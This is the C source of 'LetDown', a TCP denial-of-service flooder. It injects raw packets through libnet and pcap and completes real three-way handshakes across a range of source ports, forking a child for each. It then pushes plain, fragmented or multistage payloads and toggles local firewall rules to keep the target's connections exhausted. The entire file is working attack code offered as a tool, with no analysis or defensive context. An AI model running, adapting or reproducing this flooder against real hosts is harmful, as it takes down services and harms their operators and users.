/*
 * LetDown, tcp dos flooder. Raw 3 way handshake...
 * See http://insecure.org/stf/tcp-dos-attack-explained.html
 *
 * Copyright (C) 2008  Acri Emanuele <crossbower@gmail.com>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 * 
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 * 
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include "argparser.h"
#include "letdown.h"

/*
 * Destructor and signal handler
 */
void pre_exit()
{
    fprintf(stderr, "Exiting...\n");
    
    // turn off firewall
    firewall_off(&progopt);
    
    exit(0);
}

/*
 * SIG_ALRM handler
 */
void catch_alarm()
{
    exit(0);
}

/*
 * Emulated TCP stack
 */
void tcp_stack(u_char *args, const struct pcap_pkthdr *header, const u_char *packet)
{
    struct sniff_ethernet *ethernet;  /* The ethernet header */
    struct sniff_ip *ip;              /* The IP header */
    struct sniff_tcp *tcp;            /* The TCP header */
    char *payload;                    /* Packet payload */

#define STATUS_OK 0
#define STATUS_NO_ACK 1
#define STATUS_MULTI_WAIT 2
#define STATUS_MULTI_CONT 3
    static int ack_status=0;
    static int skip_ack=0;

    
    /* define ethernet header */
    ethernet = (struct sniff_ethernet*)(packet);
    
    /* define/compute ip header offset */
    ip = (struct sniff_ip*)(packet + SIZE_ETHERNET);
    size_ip = IP_HL(ip)*4;
    if (size_ip < 20) {
        return;
    }

    /* define/compute tcp header offset */
    tcp = (struct sniff_tcp*)(packet + SIZE_ETHERNET + size_ip);
    size_tcp = TH_OFF(tcp)*4;
    if (size_tcp < 20) {
        return;
    }
    
    /* define/compute tcp payload (segment) offset */
    payload = (u_char *)(packet + SIZE_ETHERNET + size_ip + size_tcp);
    
    /* compute tcp payload (segment) size */
    size_payload = ntohs(ip->ip_len) - (size_ip + size_tcp);
    
    /* TCP STACK EMULATION */
    
    // check for duplicated packets
    if(host_seq==ntohl(tcp->th_seq) && host_ack==(tcp->th_ack) && host_len==size_payload) {
        
        deja_acked = 1;
        
        // packet injection
        if(resend_last() == -1) {
            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
            exit(EXIT_FAILURE);
        }
        
        return;
    }
    else {
    
        host_seq=ntohl(tcp->th_seq);
        host_ack=(tcp->th_ack);
        host_len==size_payload;
        
        deja_acked = 0;
    }
    
    /* RST received */
    if(tcp->th_flags&TH_RST) {
    
        fprintf(stderr, "Error: received tcp reset packet\n");
        exit(0);
    }
    
    /* SYN-ACK received */
    else if(tcp->th_flags == (TH_SYN|TH_ACK)) {
   
        /* Send ACK */
        
        // packet injection
        if(send_tcp_start_ack(ip, tcp) == -1) {
            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
            exit(EXIT_FAILURE);
        }

        /* Send PAYLOAD */
        
        // multistage payload
        if(progopt.mlt && progopt.currstg->active) {
        
            // action
            if(progopt.currstg->type==TYPE_ACTION) {
                skip_ack=1;
            }
            
            // ack packet?
            else if(progopt.currstg->type==TYPE_ACK) {
            
                // packet injection
                if(send_tcp_payload(ip, tcp, progopt.currstg->payload) == -1) {
                    fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                    exit(EXIT_FAILURE);
                }
            }
            
            // push-ack packet?
            else if(progopt.currstg->action==TYPE_ACK_PUSH) {
            
                // packet injection
                if(send_tcp_payload_push(ip, tcp, progopt.currstg->payload) == -1) {
                    fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                    exit(EXIT_FAILURE);
                }
            }
            
            // action
            
            // reply
            if(progopt.currstg->action==ACT_WAIT_REPLY) {
                ack_status = STATUS_MULTI_WAIT;
            }
            
            // exit
            else if(progopt.currstg->action==ACT_EXIT){
                exit(0);
            }
            
            // reset
            else {
                // packet injection
                if(send_tcp_rst(ip, tcp) == -1) {
                    fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                    exit(EXIT_FAILURE);
                }
                exit(0);
            }
            
            // next struct
            progopt.currstg++;
        }
        
        // fragmentation enabled?
        else if(progopt.frag && progopt.payload[0]!='\0') {
            int i=0;
            int temp=progopt.frag;
            
            for(i=0; i<progopt.fragc; i++) {
            
                // ajust fragment offset
                progopt.frag = temp * (i+1);

                // packet injection
                if(send_tcp_payload(ip, tcp, progopt.payload) == -1) {
                    fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                    exit(EXIT_FAILURE);
                }
            }
            
            // restore
            progopt.frag=temp;
            
            ack_status = STATUS_NO_ACK;
        }
        
        // normal...
        else if(progopt.payload[0]!='\0') {

            // packet injection
            if(send_tcp_payload(ip, tcp, progopt.payload) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
            
            ack_status = STATUS_NO_ACK;
        }
        
        // send acknowledgment packets?
        if(!progopt.ack)
            exit(0);
    } 
    
    /* ACK received */
    if(tcp->th_flags == (TH_ACK) || tcp->th_flags == (TH_PUSH|TH_ACK)) {

        /* Send ACK */
        
        // multistage payload
        if(ack_status == STATUS_MULTI_WAIT || ack_status == STATUS_MULTI_CONT) {
        
            // wait reply and ack it
            if(ack_status == STATUS_MULTI_WAIT) {
                
                // drop first ack packet
                if(skip_ack==0) {
                        
                    // send payload?
                    if(size_payload) {
                    
                        // check stage struct
                       if(progopt.currstg->active==0) {
                            ack_status = STATUS_OK;
                            return;
                        }
                    
                        // ack packet?
                        if(progopt.currstg->type==TYPE_ACK) {
                        
                            // packet injection
                            if(send_tcp_payload(ip, tcp, progopt.currstg->payload) == -1) {
                                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                                exit(EXIT_FAILURE);
                            }
                        }
                        
                        // push ack packet?
                        else if(progopt.currstg->action==TYPE_ACK_PUSH) {
                        
                            // packet injection
                            if(send_tcp_payload_push(ip, tcp, progopt.currstg->payload) == -1) {
                                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                                exit(EXIT_FAILURE);
                            }
                        }
                        
                        // action
                        
                        // reply
                        if(progopt.currstg->action==ACT_WAIT_REPLY) {
                            ack_status = STATUS_MULTI_WAIT;
                        }
                        
                        // exit
                        else if(progopt.currstg->action==ACT_EXIT){
                            exit(0);
                        }
                        
                        // reset
                        else {
                            // packet injection
                            if(send_tcp_rst(ip, tcp) == -1) {
                                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                                exit(EXIT_FAILURE);
                            }
                            exit(0);
                        }
                        
                        // next struct
                        progopt.currstg++;
                    }
                    
                    // drop first ack packet
                    else {
                    
                        skip_ack = 1;
                        return;
                    }
                }
                
                // ack reply and send payload
                else {
                    skip_ack = 0;
                    ack_status = STATUS_MULTI_CONT;
                    
                    // packet injection
                    if(send_tcp_ack(ip, tcp) == -1) {
                        fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                        exit(EXIT_FAILURE);
                    }
                    
                    // check stage struct
                    if(progopt.currstg->active==0) {
                        ack_status = STATUS_OK;
                        return;
                    }
                
                    // ack packet?
                    if(progopt.currstg->type==TYPE_ACK) {
                    
                        // packet injection
                        if(send_tcp_payload(ip, tcp, progopt.currstg->payload) == -1) {
                            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                            exit(EXIT_FAILURE);
                        }
                    }
                    
                    // push ack packet?
                    else if(progopt.currstg->action==TYPE_ACK_PUSH) {
                    
                        // packet injection
                        if(send_tcp_payload_push(ip, tcp, progopt.currstg->payload) == -1) {
                            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                            exit(EXIT_FAILURE);
                        }
                    }
                    
                    // action
                    
                    // reply
                    if(progopt.currstg->action==ACT_WAIT_REPLY) {
                        ack_status = STATUS_MULTI_WAIT;
                    }
                    
                    // exit
                    else if(progopt.currstg->action==ACT_EXIT){
                        exit(0);
                    }
                    
                    // reset
                    else {
                        // packet injection
                        if(send_tcp_rst(ip, tcp) == -1) {
                            fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                            exit(EXIT_FAILURE);
                        }
                        exit(0);
                    }
                    
                    // next struct
                    progopt.currstg++;   
                }
            }
            
            // send next multistage payload
            else {
            
                // check stage struct
                if(progopt.currstg->active==0) {
                    ack_status = STATUS_OK;
                    return;
                }
            
                // ack packet?
                if(progopt.currstg->type==TYPE_ACK) {
                
                    // packet injection
                    if(send_tcp_payload(ip, tcp, progopt.currstg->payload) == -1) {
                        fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                        exit(EXIT_FAILURE);
                    }
                }
                
                // push ack packet?
                else if(progopt.currstg->action==TYPE_ACK_PUSH) {
                
                    // packet injection
                    if(send_tcp_payload_push(ip, tcp, progopt.currstg->payload) == -1) {
                        fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                        exit(EXIT_FAILURE);
                    }
                }
                
                // action
                
                // reply
                if(progopt.currstg->action==ACT_WAIT_REPLY) {
                    ack_status = STATUS_MULTI_WAIT;
                }
                
                // exit
                else if(progopt.currstg->action==ACT_EXIT){
                    exit(0);
                }
                
                // reset
                else {
                    // packet injection
                    if(send_tcp_rst(ip, tcp) == -1) {
                        fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                        exit(EXIT_FAILURE);
                    }
                    exit(0);
                }
                
                // next struct
                progopt.currstg++;   
            }
        }
        
        // check ack status
        else if(ack_status==STATUS_NO_ACK) {
            ack_status=STATUS_OK;
            
            return;
        }

        // normal ack reply
        else if (ack_status==STATUS_OK){

            // packet injection
            if(send_tcp_ack(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
        }
        
    }
    
    /* FIN-ACK received */
    if((tcp->th_flags == (TH_FIN|TH_ACK)) && (progopt.fin || progopt.rst)) {

        // close with grace?
        
        /* Send RST */
        if(progopt.rst) {
            // packet injection
            if(send_tcp_rst(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
        }

        /* Send ACK and FIN */
        else {
                
            // packet injection
            if(send_tcp_end_ack(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
            
            // packet injection
            if(send_tcp_fin_ack(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
        }
        
        exit(0);
    }
    
    /* FIN received */
    if((tcp->th_flags == (TH_FIN)) && (progopt.fin || progopt.rst)) {

        // close with grace?
        
        /* Send RST */
        if(progopt.rst) {
            // packet injection
            if(send_tcp_rst(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
        }

        /* Send ACK and FIN */
        else {
            
            // packet injection
            if(send_tcp_end_ack(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
            
            // packet injection
            if(send_tcp_fin(ip, tcp) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
        }
        
        exit(0);
    }
    
    return;
}

/*
 * Stream loop function
 */
void streamloop()
{
    // libnet stuff
    char lnet_errbuf[LIBNET_ERRBUF_SIZE];
    
    // pcap stuff
    char pcap_errbuf[PCAP_ERRBUF_SIZE];
    char filter_exp[MAX_ARG];
    char *dev;
    
    // port range...
    src_prt = 0;
    start_prt = progopt.xport;
    end_prt = progopt.yport;
    dst_prt = progopt.dport;
    
    // ip stuff
    u_int32_t mask, net;
    ipid = 0;
   
    
    /* Initialize LIBNET */
    
    // libnet init
    l = libnet_init(LIBNET_RAW4, progopt.device[0]!='\0' ? progopt.device : NULL, lnet_errbuf);
    if ( l == NULL ) {
        fprintf(stderr, "libnet_init() failed: %s\n", lnet_errbuf);
        exit(EXIT_FAILURE);
    }

    // check destination ip
    dst_ip = libnet_name2addr4(l, progopt.dstaddr, LIBNET_DONT_RESOLVE);
    if(!dst_ip) {
        fprintf(stderr, "Destination address error.\n");
        exit(EXIT_FAILURE);
    }
    
    // check source ip
    if(progopt.srcaddr[0]!='\0') {
        src_ip = libnet_name2addr4(l, progopt.srcaddr, LIBNET_DONT_RESOLVE);
        if(!src_ip) {
            fprintf(stderr, "Source address error.\n");
            exit(EXIT_FAILURE);
        }
    }
    else {
        src_ip = libnet_get_ipaddr4(l);
        if(!src_ip) {
            fprintf(stderr, "Couldn't get own IP address: %s\n", libnet_geterror(l));
            exit(EXIT_FAILURE);
        }
    }

    /* Initialize PCAP */
    
    // find a device if not specified
    if(progopt.device[0]=='\0') {
        dev = pcap_lookupdev(pcap_errbuf);
        if (dev == NULL) {
            fprintf(stderr, "Couldn't find default device: %s\n", pcap_errbuf);
            exit(EXIT_FAILURE);
        }
    }
    else {
        dev = progopt.device;
    }

    // get network number and mask associated with capture device
    if(pcap_lookupnet(dev, &net, &mask, pcap_errbuf) == -1) {
        fprintf(stderr, "Couldn't get netmask for device %s: %s\n", dev, pcap_errbuf);
        exit(EXIT_FAILURE);
    }

    // open capture device
    handle = pcap_open_live(dev, PKT_LEN, 1, progopt.time, pcap_errbuf);
    if (handle == NULL) {
        fprintf(stderr, "Couldn't open device %s: %s\n", dev, pcap_errbuf);
        exit(EXIT_FAILURE);
    }
    
    /* Stream LOOP */
    for(src_prt=start_prt; src_prt<=end_prt; src_prt++) {
        
        // sleep
        usleep(progopt.time);
        
        /* child process */
        if(fork()==0) {
            
            alarm(progopt.alarm); //set timer
            
            
            /* Send SYN */
            
            // packet injection
            if(send_tcp_syn(NULL, NULL) == -1) {
                fprintf(stderr, "Error writing packet: %s\n", libnet_geterror(l));
                exit(EXIT_FAILURE);
            }
            
            
            /* Start SNIFFING */
            
            // prepare the filter expression
            if(progopt.srcaddr[0]=='\0') {
                sprintf(filter_exp,
                    "src host %s and src port %d and dst port %d",
                    progopt.dstaddr, dst_prt, src_prt);
            }
            else {
                sprintf(filter_exp,
                    "src host %s and src port %d and dst port %d and dst host %s",
                    progopt.dstaddr, dst_prt, src_prt, progopt.srcaddr);
            }

            // compile the filter expression
            if (pcap_compile(handle, &fp, filter_exp, 0, net) == -1) {
                fprintf(stderr, "Couldn't parse filter %s: %s\n",
                    filter_exp, pcap_geterr(handle));
                exit(EXIT_FAILURE);
            }

            // apply the compiled filter
            if (pcap_setfilter(handle, &fp) == -1) {
                fprintf(stderr, "Couldn't install filter %s: %s\n",
                    filter_exp, pcap_geterr(handle));
                exit(EXIT_FAILURE);
            }

            // set callback function
            pcap_loop(handle, -1, tcp_stack, NULL);
            
            sleep(1000);
        }
        
        /* daddy process */
        else {
            wait(0);
        }
        
        // free compiled filter
        pcap_freecode(&fp);
    }
    
    // close libnet
    libnet_destroy(l);
    
    // close pcap
    pcap_close(handle);
    
    return;
}

/*
 * Program init
 */
int main(int argc, char **argv)
{
    // Establish a handler for signals
    signal (SIGALRM, catch_alarm);
    signal (SIGTERM, pre_exit);
    signal (SIGKILL, pre_exit);
    
    // Fill options struct
    parseopt(&progopt, argc, argv);
    
    // Firewall rule on
    if(progopt.firewall[0][0]!='\0') {
        firewall_on(&progopt);
    }
    
    // Flooding loop
    streamloop();
    
    // Firewall rule off
    if(progopt.firewall[1][0]!='\0') {
        firewall_off(&progopt);
    }
        
    return 0;
}

